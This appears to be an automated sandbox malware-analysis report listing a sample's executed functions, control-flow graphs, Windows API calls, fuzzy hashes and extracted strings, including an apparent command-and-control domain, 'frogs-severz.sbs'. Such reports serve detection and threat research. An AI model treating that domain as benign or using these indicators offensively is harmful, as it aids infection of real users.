99dda8 7052->7053 6791 98ceb3 CoInitializeSecurity 6792 98d7d3 CoUninitialize 6793 98d7da 6792->6793 7001 98dc33 7003 98dcd0 7001->7003 7002 98dd4e 7003->7002 7005 9bdf70 LdrInitializeThunk 7003->7005 7005->7002 7054 98c32b 7055 9bded0 RtlAllocateHeap 7054->7055 7056 98c338 7055->7056 6813 98e88f 6814 98e88e 6813->6814 6814->6813 6817 98e89c 6814->6817 6819 9bdf70 LdrInitializeThunk 6814->6819 6816 98e948 6817->6816 6820 9bdf70 LdrInitializeThunk 6817->6820 6819->6817 6820->6816 6740 9889a0 6741 9889af 6740->6741 6742 988cb3 ExitProcess 6741->6742 6743 988cae 6741->6743 6748 98ce80 CoInitializeEx 6741->6748 6749 9bdeb0 6743->6749 6752 9bf460 6749->6752 6751 9bdeb5 FreeLibrary 6751->6742 6753 9bf469 6752->6753 6753->6751 7024 98a2e1 7025 98a3d0 7024->7025 7025->7025 7028 98b210 7025->7028 7031 98b2a0 7028->7031 7029 9bded0 RtlAllocateHeap 7029->7031 7030 98a3fe 7031->7029 7031->7030 6754 9a1960 6755 9a19d8 6754->6755 6760 999530 6755->6760 6757 9a1a84 6758 999530 LdrInitializeThunk 6757->6758 6759 9a1b29 6758->6759 6761 999560 6760->6761 6761->6761 6772 9c0480 6761->6772 6763 999756 6769 999783 6763->6769 6771 9996ca 6763->6771 6776 9c0880 6763->6776 6764 99974b 6782 9c07b0 6764->6782 6765 99962e 6765->6763 6765->6764 6766 9c0480 LdrInitializeThunk 6765->6766 6765->6769 6765->6771 6766->6765 6769->6771 6786 9bdf70 LdrInitializeThunk 6769->6786 6771->6757 6771->6771 6774 9c04a0 6772->6774 6773 9c05be 6773->6765 6774->6773 6787 9bdf70 LdrInitializeThunk 6774->6787 6777 9c08b0 6776->6777 6779 9c08fe 6777->6779 6788 9bdf70 LdrInitializeThunk 6777->6788 6778 9c09ae 6778->6769 6779->6778 6789 9bdf70 LdrInitializeThunk 6779->6789 6784 9c07e0 6782->6784 6783 9c082e 6783->6763 6784->6783 6790 9bdf70 LdrInitializeThunk 6784->6790 6786->6771 6787->6773 6788->6779 6789->6778 6790->6783 6794 9bb7e0 6795 9bb800 6794->6795 6795->6795 6796 9bb83f RtlAllocateHeap 6795->6796 6990 9bbce0 6991 9bbd5a 6990->6991 6992 9bbcf2 6990->6992 6992->6991 6994 9bbd52 6992->6994 6998 9bdf70 LdrInitializeThunk 6992->6998 6995 9bbede 6994->6995 6999 9bdf70 LdrInitializeThunk 6994->6999 6995->6991 7000 9bdf70 LdrInitializeThunk 6995->7000 6998->6994 6999->6995 7000->6991 7014 9c02c0 7015 9c02e0 7014->7015 7015->7015 7016 9c041e 7015->7016 7018 9bdf70 LdrInitializeThunk 7015->7018 7018->7016 7037 9c0a00 7039 9c0a30 7037->7039 7038 9c0b2e 7041 9c0a7e 7039->7041 7043 9bdf70 LdrInitializeThunk 7039->7043 7041->7038 7044 9bdf70 LdrInitializeThunk 7041->7044 7043->7041 7044->7038 6797 98cf05 6798 98cf20 6797->6798 6803 9b9030 6798->6803 6800 98cf7a 6801 9b9030 5 API calls 6800->6801 6802 98d3ca 6801->6802 6804 9b9090 6803->6804 6804->6804 6805 9b91b1 SysAllocString 6804->6805 6809 9b966a 6804->6809 6807 9b91df 6805->6807 6806 9b969c GetVolumeInformationW 6811 9b96ba 6806->6811 6808 9b91ea CoSetProxyBlanket 6807->6808 6807->6809 6808->6809 6812 9b920a 6808->6812 6809->6806 6810 9b9658 SysFreeString SysFreeString 6810->6809 6811->6800 6812->6810

                              Executed Functions

                              Function 009B9030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 9b9030-9b9089 1 9b9090-9b90c6 0->1 1->1 2 9b90c8-9b90e4 1->2 4 9b90f1-9b913f 2->4 5 9b90e6 2->5 7 9b968c-9b96b8 call 9bf9a0 GetVolumeInformationW 4->7 8 9b9145-9b9177 4->8 5->4 13 9b96ba 7->13 14 9b96bc-9b96df call 9a0650 7->14 9 9b9180-9b91af 8->9 9->9 11 9b91b1-9b91e4 SysAllocString 9->11 18 9b91ea-9b9204 CoSetProxyBlanket 11->18 19 9b9674-9b9688 11->19 13->14 20 9b96e0-9b96e8 14->20 21 9b966a-9b9670 18->21 22 9b920a-9b9225 18->22 19->7 20->20 23 9b96ea-9b96ec 20->23 21->19 25 9b9230-9b9262 22->25 26 9b96fe-9b972d call 9a0650 23->26 27 9b96ee-9b96fb call 988330 23->27 25->25 28 9b9264-9b92df 25->28 35 9b9730-9b9738 26->35 27->26 36 9b92e0-9b930b 28->36 35->35 38 9b973a-9b973c 35->38 36->36 37 9b930d-9b933d 36->37 49 9b9658-9b9668 SysFreeString * 2 37->49 50 9b9343-9b9365 37->50 39 9b974e-9b977d call 9a0650 38->39 40 9b973e-9b974b call 988330 38->40 46 9b9780-9b9788 39->46 40->39 46->46 48 9b978a-9b978c 46->48 51 9b979e-9b97cb call 9a0650 48->51 52 9b978e-9b979b call 988330 48->52 49->21 57 9b964b-9b9655 50->57 58 9b936b-9b936e 50->58 61 9b97d0-9b97d8 51->61 52->51 57->49 58->57 60 9b9374-9b9379 58->60 60->57 63 9b937f-9b93cf 60->63 61->61 64 9b97da-9b97dc 61->64 69 9b93d0-9b9416 63->69 65 9b97ee-9b97f5 64->65 66 9b97de-9b97eb call 988330 64->66 66->65 69->69 71 9b9418-9b942d 69->71 72 9b9431-9b9433 71->72 73 9b9439-9b943f 72->73 74 9b9636-9b9647 72->74 73->74 75 9b9445-9b9452 73->75 74->57 76 9b948d 75->76 77 9b9454-9b9459 75->77 80 9b948f-9b94b7 call 9882b0 76->80 79 9b946c-9b9470 77->79 81 9b9472-9b947b 79->81 82 9b9460 79->82 90 9b95e8-9b95f9 80->90 91 9b94bd-9b94cb 80->91 86 9b947d-9b9480 81->86 87 9b9482-9b9486 81->87 85 9b9461-9b946a 82->85 85->79 85->80 86->85 87->85 89 9b9488-9b948b 87->89 89->85 93 9b95fb 90->93 94 9b9600-9b960c 90->94 91->90 92 9b94d1-9b94d5 91->92 95 9b94e0-9b94ea 92->95 93->94 96 9b960e 94->96 97 9b9613-9b9633 call 9882e0 call 9882c0 94->97 98 9b94ec-9b94f1 95->98 99 9b9500-9b9506 95->99 96->97 97->74 101 9b9590-9b9596 98->101 102 9b9508-9b950b 99->102 103 9b9525-9b9533 99->103 109 9b9598-9b959e 101->109 102->103 105 9b950d-9b9523 102->105 106 9b95aa-9b95b3 103->106 107 9b9535-9b9538 103->107 105->101 113 9b95b9-9b95bc 106->113 114 9b95b5-9b95b7 106->114 107->106 110 9b953a-9b9581 107->110 109->90 112 9b95a0-9b95a2 109->112 110->101 112->95 117 9b95a8 112->117 115 9b95be-9b95e2 113->115 116 9b95e4-9b95e6 113->116 114->109 115->101 116->101 117->90
                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 009B91B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009B91FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-4011188741
                              • Opcode ID: c7f3261f390b3e2da62e98f56ef68ee02d275a0b254baaa46c7bd5b42da36364
                              • Instruction ID: f2b65b923da1ec5962d00981040be4cb4076ac789c090109a643fb0d3df4722f
                              • Opcode Fuzzy Hash: c7f3261f390b3e2da62e98f56ef68ee02d275a0b254baaa46c7bd5b42da36364
                              • Instruction Fuzzy Hash: B82253719183019BE320CF24CC81B9BBBEAEFD5364F148A1CF6959B281D774E905CB92
                              Function 0098CF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 118 98cf05-98cf12 119 98cf20-98cf5c 118->119 119->119 120 98cf5e-98cfa5 call 988930 call 9b9030 119->120 125 98cfb0-98cffc 120->125 125->125 126 98cffe-98d06b 125->126 127 98d070-98d097 126->127 127->127 128 98d099-98d0aa 127->128 129 98d0cb-98d0d3 128->129 130 98d0ac-98d0b3 128->130 132 98d0eb-98d0f8 129->132 133 98d0d5-98d0d6 129->133 131 98d0c0-98d0c9 130->131 131->129 131->131 135 98d0fa-98d101 132->135 136 98d11b-98d123 132->136 134 98d0e0-98d0e9 133->134 134->132 134->134 137 98d110-98d119 135->137 138 98d13b-98d266 136->138 139 98d125-98d126 136->139 137->136 137->137 141 98d270-98d2ce 138->141 140 98d130-98d139 139->140 140->138 140->140 141->141 142 98d2d0-98d2ff 141->142 143 98d300-98d31a 142->143 143->143 144 98d31c-98d36b call 98b960 143->144 147 98d370-98d3ac 144->147 147->147 148 98d3ae-98d3c5 call 988930 call 9b9030 147->148 152 98d3ca-98d3eb 148->152 153 98d3f0-98d43c 152->153 153->153 154 98d43e-98d4ab 153->154 155 98d4b0-98d4d7 154->155 155->155 156 98d4d9-98d4ea 155->156 157 98d4fb-98d503 156->157 158 98d4ec-98d4ef 156->158 159 98d51b-98d528 157->159 160 98d505-98d506 157->160 161 98d4f0-98d4f9 158->161 163 98d52a-98d531 159->163 164 98d54b-98d557 159->164 162 98d510-98d519 160->162 161->157 161->161 162->159 162->162 165 98d540-98d549 163->165 166 98d559-98d55a 164->166 167 98d56b-98d696 164->167 165->164 165->165 168 98d560-98d569 166->168 169 98d6a0-98d6fe 167->169 168->167 168->168 169->169 170 98d700-98d72f 169->170 171 98d730-98d74a 170->171 171->171 172 98d74c-98d791 call 98b960 171->172
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$7EDB854A739D0848D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$frogs-severz.sbs$y?O1$c]e$gy
                              • API String ID: 0-1167271720
                              • Opcode ID: b29f319c8602ac95de57018fd2543965c16d93110862c330b5c60f789d0e06f4
                              • Instruction ID: 9b94dfe470c9ba3d2206475193502503394a3f0cc7bfaa599031b7b08ffc230e
                              • Opcode Fuzzy Hash: b29f319c8602ac95de57018fd2543965c16d93110862c330b5c60f789d0e06f4
                              • Instruction Fuzzy Hash: 77120CB158D3C18ED3358F25C495BEFBBE1ABD2304F18895CC4DA5B296C775090ACBA2
                              Function 009889A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 203 9889a0-9889b1 call 9bcb70 206 988cb3-988cbb ExitProcess 203->206 207 9889b7-9889cf call 9b6620 203->207 211 988cae call 9bdeb0 207->211 212 9889d5-9889fb 207->212 211->206 216 9889fd-9889ff 212->216 217 988a01-988bda 212->217 216->217 219 988c8a-988ca2 call 989ed0 217->219 220 988be0-988c50 217->220 219->211 225 988ca4 call 98ce80 219->225 221 988c52-988c54 220->221 222 988c56-988c88 220->222 221->222 222->219 227 988ca9 call 98b930 225->227 227->211
                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 00988CB5
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 637cd5d6320d92c08ecc888f912cba46c643b4e80e106e8489bb5c7e0f46f5cf
                              • Instruction ID: 6abc633b1fc12cc2e919186f0b24b38f39ee439bb6901f7bb338c9a86d5348ac
                              • Opcode Fuzzy Hash: 637cd5d6320d92c08ecc888f912cba46c643b4e80e106e8489bb5c7e0f46f5cf
                              • Instruction Fuzzy Hash: 30710273B547040BC708DEBAD89235BFAD6ABC8714F09D83DA888D7390EAB89C054795
                              Function 009BDF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 9bdf70-9bdfa2 LdrInitializeThunk
                              APIs
                              • LdrInitializeThunk.NTDLL(009BBA46,?,00000010,00000005,00000000,?,00000000,?,?,00999158,?,?,009919B4), ref: 009BDF9E
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                              Function 009BB7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 9bb7e0-9bb7ff 230 9bb800-9bb83d 229->230 230->230 231 9bb83f-9bb85b RtlAllocateHeap 230->231
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 009BB84E
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 5c8c9759c811bb99d4469fb05fa4c09ba99e8d9014455b71b5b976b835902299
                              • Instruction ID: 8cc2d922f784e96d34f82e3d263a3e488fd0b78bc39d7ccf81b1fdc035693c74
                              • Opcode Fuzzy Hash: 5c8c9759c811bb99d4469fb05fa4c09ba99e8d9014455b71b5b976b835902299
                              • Instruction Fuzzy Hash: AF017633A567080BC300AE7CDC9468ABB96EFD9224F2A463DE5D4873D0DA31990A8295
                              Function 0098CE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 98ce80-98ceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0098CE93
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: 40c4b9d7db80c05d27c2c13e1d64048b2b1044c409a5899495493b86f11f29cb
                              • Instruction ID: 5463b4a4f29e904c3ee61167173fe04d3470eb2f3d4a6d9f480008da0c4bf2a8
                              • Opcode Fuzzy Hash: 40c4b9d7db80c05d27c2c13e1d64048b2b1044c409a5899495493b86f11f29cb
                              • Instruction Fuzzy Hash: 7ED0A7216A424477E114A22DEC03F17325D8B02755F440226E6A6DA1D2D951A911E5A7
                              Function 0098CEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 98ceb3-98cee2 CoInitializeSecurity
                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0098CEC6
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: 2e03b9d1677ebea48487f7149feb0eebbf5383f8654de31a8b037cfdf44e3f72
                              • Instruction ID: ca48fc51a0c4045c586d02913ae589a4f941afc98a2c430a94034b2de7ea9311
                              • Opcode Fuzzy Hash: 2e03b9d1677ebea48487f7149feb0eebbf5383f8654de31a8b037cfdf44e3f72
                              • Instruction Fuzzy Hash: CCD0C9317EC342BAF96886089C53F1022058705F29F740A08B332FE2D1CCD071429608
                              Function 0098D7D3 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 265 98d7d3-98d7d8 CoUninitialize 266 98d7da-98d7e1 265->266
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332134359.0000000000C7D000.00000080.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332941802.0000000000E15000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1332956902.0000000000E16000.00000080.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_980000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              • Opcode ID: 70af8250bffe2c599c77a4654f27ccce8993e52d99016aa34ed78b000a2b62e9
                              • Instruction ID: 64c1c76747dac98cf07f7ee528d8371df797e86caa126fa0fe462e79efaf3032
                              • Opcode Fuzzy Hash: 70af8250bffe2c599c77a4654f27ccce8993e52d99016aa34ed78b000a2b62e9
                              • Instruction Fuzzy Hash: 09A02437F10014445F4000F47C010DDF310D1C00377100373C31CC1400D533113501C1

                              Non-executed Functions

                              Function 009A3D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1331797625.0000000000981000.00000040.00000001.01000000.00000004.sdmp, Offset: 00980000, based on PE: true
                              • Associated: 00000003.00000002.1331781288.0000000000980000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331797625.00000000009C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331870266.00000000009D7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.00000000009D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C3B000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C67000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C6D000.00000040.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.1331884511.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
